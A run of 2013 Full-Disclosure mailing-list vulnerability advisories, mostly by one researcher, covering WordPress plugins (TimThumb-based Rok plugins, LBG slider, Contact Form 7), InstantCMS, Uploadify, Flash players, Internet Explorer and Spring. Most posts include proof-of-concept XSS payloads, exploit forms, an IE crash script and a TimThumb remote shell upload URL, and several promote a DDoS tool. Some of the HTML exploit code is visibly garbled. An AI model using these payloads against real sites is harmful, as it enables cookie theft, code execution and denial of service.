Even there were cases, when WP developers wrote about fixed FPD in official announcements. Full path disclosure (WASC-13): In function get_allowed_mime_types(). In function set_url_scheme(). In function comment_form(). Vulnerable are WordPress 3.6 and previous versions. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Day of bugs in WordPress 3
Hello participants of Mailing List. After you've watched my video demonstration of DAVOSET - DDoS attacks via other sites execution tool (http://www.youtube.com/watch?v=RKi35-f346I) and other my videos on security and non-security topics (http://www.youtube.com/user/MustLiveUA/videos), including videos from events in Kyiv, Ukraine, here are news for you. As I announced last week at my site, today I'll conduct new project - Day of bugs in WordPress 3. Such projects lead to improving security of web applications and to increasing awareness of web developers. After conducting Month of Search Engines Bugs (http://websecurity.com.ua/category/moseb/) in June 2007 and Month of Bugs in Captchas (http://websecurity.com.ua/category/mobic/) in November 2007 and many other projects during 2007-2008, I conducted projects Day of bugs in WordPress in December 2007 and Day of bugs in WordPress 2 in July 2010. In the first "Day of bugs in WordPress" project I disclosed 81 vulnerabilities in WP, in the second I disclosed 8 interesting vulnerabilities. In new project I'll disclose new interesting vulnerabilities in WP. Similarly to previous two projects Day of bugs in WordPress, this project will be interesting for every user of WordPress, for developers of WordPress, for every web developer who is using WP, for every one who is interesting in WP and to draw attention of all web developers to security of web applications. But before disclosing vulnerabilities from the project, I'll write about multiple hiddenly fixed vulnerabilities in last versions of WordPress. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Code Execution vulnerability in Contact Form 7 for WordPress
Hello list! I want to inform you about vulnerability in Contact Form 7 plugin for WordPress. This is Code Execution via Arbitrary File Uploading vulnerability. - Affected products: - Vulnerable are Contact Form 7 3.5.2 and previous versions. After my informing developer released version 3.5.3 with a fix. - Affected vendors: - Contact Form 7 http://contactform7.com -- Details: -- Code Execution (WASC-31): Attack is going via uploader. For code execution it's needed to upload phtml (on web servers with PHP) or asp/aspx (on IIS) files. The attack can be made as by user with admin rights (to make appropriate contact form with uploader tag) and by unauthenticated user, if there is already appropriate contact form at web site (made by unsuspicious admin). For the first scenario the attack process will be the next. Attacker with admin access add uploader tag into contact form at the site and use it for CE via AFU attack. There must be uploader tag in contact form and it's needed to set allowed extension to it (because besides the list of forbidden extensions, the plugin also has the list of allowed extensions and there are no scripts among them). [file file-423 filetypes:phtml] The files are uploaded into folder: http://site/wp-content/uploads/wpcf7_uploads/ At creation of this folder the file .htaccess is created (with content: Deny from all). It can be bypassed at using of other web servers besides Apache (where .htaccess is ignored), or at Apache it's possible to use vulnerabilities in WP for file deletion, or via LFI vulnerability to include a file from this folder. Timeline: 2013.09.28 - announced at my site. 2013.10.01 - informed developer. 2013.10.03-21 - conversation with developer about this and other vulnerabilities in CF7. 2013.10.09 - plugin version 3.5.3 was released. 2013.11.21 - disclosed at my site (http://websecurity.com.ua/6799/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DoS vulnerability in Internet Explorer 6, 7, 8 (access violation)
Hello list! I want to warn you about Denial of Service vulnerability in Internet Explorer. This is access violation. This exploit is based on exploit by Asesino04 for IE7. As I've tested, it also works in IE6 and IE8. - Affected products: - Vulnerable are Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.00.5730.13), Internet Explorer 8.0 (8.00.6001.18702) and previous versions of these browsers. IE 9, 10 and 11 were not tested, but potentially they can be vulnerable. -- Details: -- Denial of Service (WASC-10): Browser crashes at access by id to element of web page via method document.getElementById. At that in IE 6 and 7 the browser crashes, but in IE8 the tab is automatically restarting after error message (this functionality appeared in IE8). PoC / Exploit: Internet Explorer 6, 7 & 8 DoS Exploit. http://websecurity.com.ua  function over_trigger() { var obj_col = document.getElementById("132"); obj_col.width = 42765; obj_col.span = 1000; } setTimeout("over_trigger()",1); Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] BF, LE and IAA vulnerabilities in InstantCMS
Hello list! In addition to multiple vulnerabilities in InstantCMS, which I've disclosed earlier, here are new ones. These are Brute Force, Login Enumeration and Insufficient Anti-automation vulnerabilities in InstantCMS. - Affected products: - Vulnerable are InstantCMS 1.10.3 and previous versions. - Affected vendors: - InstantSoft http://www.instantcms.ru -- Details: -- Brute Force (WASC-11): In login form there is no protection from Brute Force attacks. http://site/admin/login.php http://site/login BF vulnerabilities I found in older versions of engine. In InstantCMS 1.10.1, according to changelog, BF holes were fixed by adding captcha. Checking at official web site didn't reveal any captcha, so this fix for both BF holes wasn't verified and the captcha wasn't tested (how much is it secure, as I showed in my Month of Bugs in Captchas in 2007, captchas can be very insecure). Plus a lot of sites use older versions of InstantCMS and with all mentioned Login Enumeration vulnerabilities in InstantCMS, these BF holes are very actual. Login Enumeration (WASC-42): In registration form (http://site/registration) logins are enumerating via ajax-requests. Insufficient Anti-automation (WASC-21): Presence of the captcha in registration form (for protecting against automated registration) doesn't protect from automated login enumeration. The requests are sending to the script http://site/core/ajax/registration.php. Timeline: 2013.07.14 - found multiple vulnerabilities in InstantCMS 1.10.1. 2013.07.19 - informed developers about first part of the vulnerabilities. Ignored. 2013.07.31 - informed developers about another part of the vulnerabilities. Answered, but refused to fix. 2013.08.02 - reminded developers about first letter with holes and explained why to fix them. 2013.08.02 - developers released InstantCMS 1.10.2 without fixing any informed vulnerabilities. 2013.09.24 - announced at my site. 2013.10.15 - developers released InstantCMS 1.10.3 without fixing any informed vulnerabilities. 2013.11.15 - disclosed at my site (http://websecurity.com.ua/6785/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS and FPD vulnerabilities in LBG Zoom In/Out Effect Slider for WordPress
Hello list! I want to inform you about vulnerabilities in LBG Zoom In/Out Effect Slider plugin for WordPress. In addition to one XSS in this plugin, which was disclosed earlier (http://packetstormsecurity.com/files/123367/WordPress-LBG-Zoominoutslider-Cross-Site-Scripting.html). These are Cross-Site Scripting and Full path disclosure vulnerabilities. Altogether 26 new holes: 24 XSS and 2 FPD vulnerabilities. - Affected products: - Vulnerable are all versions of plugin LBG Zoom In/Out Effect Slider for WordPress. -- Details: -- Cross-Site Scripting (WASC-08): XSS in files add_playlist_record.php and settings_form.php. LBG Zoominoutslider XSS.html LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013 MustLive. http://websecurity.com.ua action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"; method="post"> value='">alert(document.cookie)'> LBG Zoominoutslider XSS-2.html LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013 MustLive. http://websecurity.com.ua action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"; method="post"> value='">alert(document.cookie)'> LBG Zoominoutslider XSS-3.html LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013 MustLive. http://websecurity.com.ua action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"; method="post"> value='">alert(document.cookie)'> LBG Zoominoutslider XSS-4.html LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013 MustLive. http://websecurity.com.ua action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"; method="post"> value='">alert(document.cookie)'> LBG Zoominoutslider XSS-5.html LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013 MustLive. http://websecurity.com.ua action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"; method="post"> value='alert(document.cookie)'> LBG Zoominoutslider XSS-6.html LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013 MustLive. http://websecurity.com.ua action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"; method="post"> value='">alert(document.cookie)'> LBG Zoominoutslider XSS-7.html LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013 MustLive. http://websecurity.com.ua action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"; method="post"> value='">alert(document.cookie)'> LBG Zoominoutslider XSS-8.html LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013 MustLive. http://websecurity.com.ua action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"; method="post"> value='">alert(document.cookie)'> LBG Zoominoutslider XSS-9.html LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013 MustLive. http://websecurity.com.ua action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/settings_form.php"; method="post"> value='">alert(document.cookie)'> value='">alert(document.cookie)'> value='">alert(document.cookie)'> value='">alert(document.cookie)'> value='">alert(document.cookie)'> value='">alert(document.cookie)'> value='">alert(document.cookie)'> value='">alert(document.cookie)'> value='">alert(document.cookie)'> value='">alert(document.cookie)'> value='">alert(document.cookie)'> value='">alert(document.cookie)'> value='">alert(document.cookie)'> value='alert(document.cookie)'> value='">alert(document.cookie)'> value='alert(document.cookie)'> Full path disclosure (WASC-13): http://site/wp-content/plugins/lbg_zoominoutslider/tpl/banners.php http://site/wp-content/plugins/lbg_zoominoutslider/tpl/playlist.php Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XXE Injection in Spring Framework
Hello! I'll give you additional information concerning advisory XML External Entity (XXE) Injection in Spring Framework (http://securityvulns.ru/docs29758.html). - Affected products: - - 3.0.0 to 3.2.3 (Spring OXM & Spring MVC) - 4.0.0.M1 (Spring OXM) - 4.0.0.M1-4.0.0.M2 (Spring MVC) - Earlier unsupported versions may also be affected - Affected vendors: - Spring by Pivotal. -- Details: -- The Spring OXM wrapper doesn't disable external entity resolution when using the JAXB unmarshaller (SAXSource and StreamSource instances are vulnerable). Also Spring MVC processes user provided XML with JAXB in combination with a StAX XMLInputFactory without disabling external entity resolution. Besides standard vectors of attacks with XXE Injection vulnerabilities (such as local file inclusion), which are usually mentioned in advisories, XXE Injection also allows to conduct attacks on other sites. And with using DAVOSET (DDoS attacks via other sites execution tool) it's possible to automate such attacks. I wrote about such attacks in my 2012's article "Using XML External Entities (XXE) for attacks on other sites" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2012-August/008481.html) and 2013's "Using XXE vulnerabilities for attacks on other sites" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-August/008887.html). As I described in my articles, XXE vulnerabilities can be used for conducting CSRF and DoS attacks on other sites (and at using multiple web sites it's possible to conduct DDoS attacks). And my tool DAVOSET can be used for conducting such attacks via XXE vulnerabilities. In October I released video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I So all vulnerable web applications with affected versions of Spring Framework can be used for attacks on other sites via XXE Injection. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] AFU and IL vulnerabilities in Uploadify
Hello list! These are Arbitrary File Uploading and Information Leakage vulnerabilities in Uploadify. The same as in June with previous vulnerabilities in Uploadify, in September the developers just ignored my warnings, even I sent letter to multiple their e-mail addresses. - Affected products: - Vulnerable are Uploadify v3.2.1 and previous versions. - Affected vendors: - Reactive Apps http://www.uploadify.com -- Details: -- Arbitrary File Uploading (WASC-31): Code Execution attack via file uploading. There are two methods of code execution: by using of symbol ";" (1.asp;.jpg) in file name (IIS) and by double extension (1.php.jpg) (Apache with special configuration). Information Leakage (WASC-13): Checking arbitrary file existence at the server. Uploadify IL.html Uploadify Information Leakage exploit (C) 2013 MustLive. http://websecurity.com.ua http://site/uploadify/check-exists.php"; method="post"> Timeline: 2013.09.20 - announced at my site. 2013.09.21 - informed developers on multiple e-mails. 2013.10.24 - disclosed at my site (http://websecurity.com.ua/6777/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple vulnerabilities in mp3-player
Hello list! These are Cross-Site Scripting and Content Spoofing vulnerabilities in mp3-player. - Affected products: - Vulnerable are mp3-player 2.5 and previous versions. - Affected vendors: - U-Studio http://flv-mp3.com -- Details: -- XSS (via Flash Injection) (WASC-08): http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3&skin=xss.swf In old versions of Flash player the attack will work with flash file xss.swf at any domain, in new versions - only at the same domain. Content Spoofing (Flash Injection) (WASC-12): http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3&skin=http://site2/1.swf Content Spoofing (Content Injection) (WASC-12): http://site/path/ump3player_500x70.swf?way=http://site2/1.mp3 Content Spoofing (HTML Injection) (WASC-12): http://site/path/ump3player_500x70.swf?way=http://site2&comment=test%3Cimg%20src=%27http://site2/1.jpg%27%3E XSS (WASC-08): http://site/path/ump3player_500x70.swf?way=http://site2&comment=+%3Cimg%20src=%27xss.swf%27%3E In old versions of Flash player the attack will work with flash file xss.swf at any domain, in new versions - only at the same domain. XSS (Strictly social XSS) (WASC-08): http://site/path/ump3player_500x70.swf?way=http://site2&comment=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E Timeline: 2013.08.06 - informed developers. 2013.08.12 - announced at my site. 2013.10.11 - disclosed at my site (http://websecurity.com.ua/6698/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple vulnerabilities in flv-player
Hello list! These are Cross-Site Scripting and Content Spoofing vulnerabilities in flv-player. - Affected products: - Vulnerable are flv-player 3.5 and previous versions. - Affected vendors: - U-Studio http://flv-mp3.com -- Details: -- XSS (via Flash Injection) (WASC-08): http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&skin=xss.swf In old versions of Flash player the attack will work with flash file xss.swf at any domain, in new versions - only at the same domain. Content Spoofing (Flash Injection) (WASC-12): http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&skin=http://site2/1.swf Content Spoofing (Content Injection) (WASC-12): http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv http://site/path/uflvplayer_500x375.swf?way=http://site2/1.flv&pic=http://site2/1.jpg Content Spoofing (HTML Injection) (WASC-12): http://site/path/uflvplayer_500x375.swf?way=http://site&comment=test%3Cimg%20src=%27http://site2/1.jpg%27%3E XSS (WASC-08): http://site/path/uflvplayer_500x375.swf?way=http://site&comment=+%3Cimg%20src=%27xss.swf%27%3E In old versions of Flash player the attack will work with flash file xss.swf at any domain, in new versions - only at the same domain. Also Strictly social XSS attack is possible. Timeline: 2013.08.03 - announced at my site. 2013.08.05 - informed developers. 2013.10.08 - disclosed at my site (http://websecurity.com.ua/6694/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerability in Privat24 for Android and iOS
Hello list! This is Insufficient Process Validation vulnerability in Privat24. Which allows to bypass OTP (in sms) and steal money from users' accounts. Privat24 - it's Internet banking from PrivatBank. And all mobile clients are vulnerable, unlike web site of Privat24. Since 06.06.2013, after I found the hole and inform PrivatBank, they still haven't fixed it. - Affected products: - Vulnerable are all versions (because the hole depends on server configuration). Tested in Privat24 3.27.2 for Android and Privat24 4.8.6 for iOS. Version for Windows Phone must be affected as well. - Affected vendors: - PrivatBank Privat24 for iOS https://itunes.apple.com/ru/app/privat24/id326277589?mt=8 Privat24 for Android https://play.google.com/store/apps/details?id=ua.privatbank.ap24 https://play.google.com/store/apps/details?id=ua.privatbank.ap24old Privat24 for Windows Phone http://www.windowsphone.com/ru-ru/store/app/privat24/134e3c22-dab5-4305-906b-78ec850bfe32 -- Details: -- Insufficient Process Validation (WASC-40): At logging into Privat24 via clients for Android and iOS the OTP is not asking (as it was before June 2013). I.e. without confirming with one time password, which comes by sms, it is possible to log into account - unlike web site of Privat24, where OTP is always asking. The only time, when sms with OTP comes - it's on new device to lock it to the account. After that there is no more OTP. This can be bypassed at accessing to victim's phone or tablet or by using the first hole from those which I found in Privat24 earlier. To steal money from account with bypassing OTP for transaction (as in web site of Privat24) the second hole can be used from those which I found in Privat24 earlier. Both these vulnerabilities will be disclosed soon. Watch demonstration video of vulnerability in Privat24: http://www.youtube.com/watch?v=d1ifN8MPZQo Timeline: 2013.03.14 - found two vulnerabilities in Privat24 for Android. 2013.03.15 - informed PrivatBank. Ignored. 2013.06.06 - found new vulnerability (described in this advisory) in Privat24 for Android (later tested in iOS). 2013.06.06 - informed PrivatBank. Answered, that they were aware about it and were working to fix it. 2013.06.06 - announced at my site. 2013.06 - 2013.09 - multiple times reminded PrivatBank about this hole and gave arguments about previous two holes. 2013.09.13 - disclosed at my site (http://websecurity.com.ua/6554/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple vulnerabilities in InstantCMS
Hello 3APA3A! These are Login Enumeration, Cross-Site Scripting and Content Spoofing vulnerabilities in InstantCMS. - Affected products: - Vulnerable are InstantCMS 1.10.2 and previous versions. - Affected vendors: - InstantSoft http://www.instantcms.ru -- Details: -- Login Enumeration (WASC-42): http://site/users/login It's possible to reveal logins by users' profiles. And also logins of the users are shown in many sections of the site (at users page and others), because developers don't care about leakage of logins of the users. In the next advisory about InstantCMS I'll give more example of such vulnerabilities. Cross-Site Scripting (WASC-08): http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// http://site/includes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E Content Spoofing (WASC-12): http://site/includes/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E http://site/includes/swfupload/swfupload.swf?buttonImageURL=http://demo.swfupload.org/v220/images/logo.gif Timeline: In November 2012 and March 2013 I disclosed and wrote to the lists about vulnerabilities in SWFUpload. All who want fixed these holes, but not developers of InstantCMS. 2013.07.14 - found multiple vulnerabilities in InstantCMS 1.10.1. 2013.07.19 - informed developers about first part of the vulnerabilities. Ignored. 2013.07.30 - announced at my site. 2013.07.31 - informed developers about another part of the vulnerabilities. Answered, but refused to fix. 2013.08.02 - reminded developers about first letter with holes and explained why to fix them. 2013.08.02 - developers released InstantCMS 1.10.2 without fixing any informed vulnerabilities. All above-mentioned holes work in it. 2013.09.24 - disclosed at my site (http://websecurity.com.ua/6681/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple vulnerabilities in RokMicroNews for WordPress
Hello list! I want to warn you about multiple vulnerabilities in plugin RokMicroNews for WordPress. In August 2012 I wrote about multiple vulnerabilities in RokBox for WordPress (http://securityvulns.ru/docs28871.html). These vulnerabilities are similar, since the same developers put the same vulnerable TimThumb into another their plugin (vulnerabilities in which I disclosed already in 2011). These are Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service and Arbitrary File Upload vulnerabilities. In July 2013 developers released a patch for their plugins and themes with TimThumb (http://www.rockettheme.com/wordpress-updates/1871-security-patch-for-wordpress-timthumb), which can be used to fix these vulnerabilities (except the last FPD). - Affected products: - Vulnerable are RokMicroNews 1.5 and previous versions (to attacks on TimThumb and all versions are vulnerable to FPD). Besides standalone WP plugin, this web application comes as part of the themes. Many of 56 RocketTheme's WP themes (http://www.rockettheme.com/wordpress-themes) use RokMicroNews and old versions of these themes are vulnerable to attacks on TimThumb (and all versions of them are vulnerable to FPD). - Affected vendors: - RocketTheme http://www.rockettheme.com -- Details: -- XSS (WASC-08): http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg Full path disclosure (WASC-13): http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http:// http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site/page.png&h=1&w=111 http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site/page.png&h=111&w=1 Abuse of Functionality (WASC-42): http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site&h=1&w=1 http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site.flickr.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) DoS (WASC-10): http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site/big_file&h=1&w=1 http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) About such Abuse of Functionality and Denial of Service vulnerabilities you can read in my article Using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html). For such attacks my tool DAVOSET (http://websecurity.com.ua/davoset/) can be used. Arbitrary File Upload (WASC-31): http://site/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://flickr.com.site.com/shell.php This Arbitrary File Upload vulnerability in TimThumb was disclosed after 3,5 months after my disclosure of previous holes. Full path disclosure (WASC-13): http://site/wp-content/plugins/wp_rokmicronews/rokmicronews.php Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple vulnerabilities in RokIntroScroller for WordPress
Hello list! I want to warn you about multiple vulnerabilities in plugin RokIntroScroller for WordPress. In August 2012 I wrote about multiple vulnerabilities in RokBox for WordPress (http://securityvulns.ru/docs28871.html). These vulnerabilities are similar, since the same developers put the same vulnerable TimThumb into another their plugin (vulnerabilities in which I disclosed already in 2011). These are Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service and Arbitrary File Upload vulnerabilities. In July 2013 developers released a patch for their plugins and themes with TimThumb (http://www.rockettheme.com/wordpress-updates/1871-security-patch-for-wordpress-timthumb), which can be used to fix these vulnerabilities (except the last FPD). - Affected products: - Vulnerable are RokIntroScroller 1.8 and previous versions (to attacks on TimThumb and all versions are vulnerable to FPD). Besides standalone WP plugin, this web application comes as part of the themes. Many of 56 RocketTheme's WP themes (http://www.rockettheme.com/wordpress-themes) use RokIntroScroller and old versions of these themes are vulnerable to attacks on TimThumb (and all versions of them are vulnerable to FPD). - Affected vendors: - RocketTheme http://www.rockettheme.com -- Details: -- XSS (WASC-08): http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg Full path disclosure (WASC-13): http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http:// http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://site/page.png&h=1&w=111 http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://site/page.png&h=111&w=1 Abuse of Functionality (WASC-42): http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://site&h=1&w=1 http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://site.flickr.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) DoS (WASC-10): http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://site/big_file&h=1&w=1 http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) About such Abuse of Functionality and Denial of Service vulnerabilities you can read in my article Using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html). For such attacks my tool DAVOSET (http://websecurity.com.ua/davoset/) can be used. Arbitrary File Upload (WASC-31): http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://flickr.com.site.com/shell.php This Arbitrary File Upload vulnerability in TimThumb was disclosed after 3,5 months after my disclosure of previous holes. Full path disclosure (WASC-13): http://site/wp-content/plugins/wp_rokintroscroller/rokintroscroller.php Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS and Redirector vulnerabilities in InstantCMS
Hello list! These are Cross-Site Scripting and Redirector vulnerabilities in InstantCMS. - Affected products: - Vulnerable are InstantCMS 1.10.2 and previous versions. - Affected vendors: - InstantSoft http://www.instantcms.ru -- Details: -- Cross-Site Scripting (WASC-08): GET request to http://site/modules/mod_template/set.php with setting Referer header. Referer: data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B Redirector (URL Redirector Abuse) (WASC-38): GET request to http://site/modules/mod_template/set.php with setting Referer header. Referer: http://websecurity.com.ua Timeline: 2013.07.14 - found multiple vulnerabilities in InstantCMS 1.10.1. 2013.07.17 - announced at my site. 2013.07.19 - informed developers about first part of the vulnerabilities. Ignored. 2013.07.31 - informed developers about another part of the vulnerabilities. Answered, but refused to fix. 2013.08.02 - reminded developers about first letter with holes and explained why to fix them. 2013.08.02 - developers released InstantCMS 1.10.2 without fixing any informed vulnerabilities. Both above-mentioned holes work in it. 2013.09.17 - disclosed at my site (http://websecurity.com.ua/6661/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple vulnerabilities in RokNewsPager for WordPress
Hello list! I want to warn you about multiple vulnerabilities in plugin RokNewsPager for WordPress. In August 2012 I wrote about multiple vulnerabilities in RokBox for WordPress (http://securityvulns.ru/docs28871.html). These vulnerabilities are similar, since the same developers put the same vulnerable TimThumb into another their plugin (vulnerabilities in which I disclosed already in 2011). These are Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service and Arbitrary File Upload vulnerabilities. In July 2013 developers released a patch for their plugins and themes with TimThumb (http://www.rockettheme.com/wordpress-updates/1871-security-patch-for-wordpress-timthumb), which can be used to fix these vulnerabilities (except the last FPD). - Affected products: - Vulnerable are RokNewsPager 1.17 and previous versions (to attacks on TimThumb and all versions are vulnerable to FPD). Besides standalone WP plugin, this web application comes as part of the themes. Many of 56 RocketTheme's WP themes (http://www.rockettheme.com/wordpress-themes) use RokStories and old versions of these themes are vulnerable to attacks on TimThumb (and all versions of them are vulnerable to FPD). - Affected vendors: - RocketTheme http://www.rockettheme.com -- Details: -- XSS (WASC-08): http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg Full path disclosure (WASC-13): http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=http:// http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=http://site/page.png&h=1&w=111 http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=http://site/page.png&h=111&w=1 Abuse of Functionality (WASC-42): http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=http://site&h=1&w=1 http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=http://site.flickr.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) DoS (WASC-10): http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=http://site/big_file&h=1&w=1 http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on) About such Abuse of Functionality and Denial of Service vulnerabilities you can read in my article Using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html). For such attacks my tool DAVOSET (http://websecurity.com.ua/davoset/) can be used. Arbitrary File Upload (WASC-31): http://site/wp-content/plugins/wp_roknewspager/thumb.php?src=http://flickr.com.site.com/shell.php This Arbitrary File Upload vulnerability in TimThumb was disclosed after 3,5 months after my disclosure of previous holes. Full path disclosure (WASC-13): http://site/wp-content/plugins/wp_roknewspager/roknewspager.php Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Multiple vulnerabilities in RokStories for WordPress
